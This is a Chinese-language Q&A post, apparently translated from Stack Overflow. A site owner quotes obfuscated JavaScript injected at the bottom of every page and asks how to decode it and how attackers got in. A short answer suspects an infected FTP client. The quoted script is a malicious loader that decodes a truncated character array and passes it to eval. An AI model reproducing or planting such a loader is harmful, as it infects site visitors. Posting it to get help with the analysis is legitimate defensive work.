1

我们的网站托管在一个相当流行的 .NET 托管服务提供商上。所以我认为它是安全的,问题就在我们这边。如果我错了,请告诉我。

我收到来自我的网站的投诉,说它有病毒。所以我去查看主页。

我注意到在每一页中,我们在页面底部都有以下额外的脚本!

<script>
try{document["b"+"o"+"d"+"y"]*=document}
catch(dgsgsdg){zxc=12;ww=window;}
try{d=document["createElement"]("span");}
catch(agdsg){zxc=0;}
try{if(ww.document)window["doc"+"ument"]["body"]="zxc"}
catch(bawetawe){if(ww.document){v=window;
n=["9","9","41","3o","16","1e","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h" .... ];
//truncated for security reasons

h=2;s="";if(zxc){for(i=0;i-632!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],12*2+2));}z=s;vl="val";if(ww.document)eval(z)}}}</script><script>try{window.document.body/=2}catch(dgsgsdg){zxc=12;ww=window;}if(zxc){try{f=document.createElement("div");}catch(agdsg){zxc=0;}try{document.body--;}catch(bawetawe){if(ww.document){v=window;
n=["9","9","41","3o","16","1e","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h" .... ];
//truncated for security reasons

h=2;s="";if(zxc){for(i=0;i-632!=0;i++){k=i;s+=String["fro"+"mC"+"harCode"]
(parseInt(n[i],12*2+1+1));}z=s;ww["eval"](s);}}}}
</script></body>

只有我知道密码,我发誓没有给任何人。密码是随机的,符合安全标准,我们大约每年更改一次密码,我知道不是很频繁,但我想还可以。

问题是:

  1. WTF 这个脚本在做什么?如何对 n=["9".....] 数组进行逆向工程?我想找到踪迹。

  2. 我们以什么可能的方式搞砸了,让黑客进来了?在这种情况下,除了 bruce force 我们的密码并走运之外,他还能以其他方式做到这一点吗?

4

1 回答 1

1

“每个页面底部的片段通常表明您的 FTP 程序已被感染,需要删除/更改。- techfoobar”

虽然我不是 100% 肯定,但我认为 techfoobar 是正确的。我用来上传网站的 FTP 软件肯定被感染了。我不知道它是怎么发生的,但它已经崩溃并且现在不再在操作系统中运行。

于 2013-04-01T06:22:55.920 回答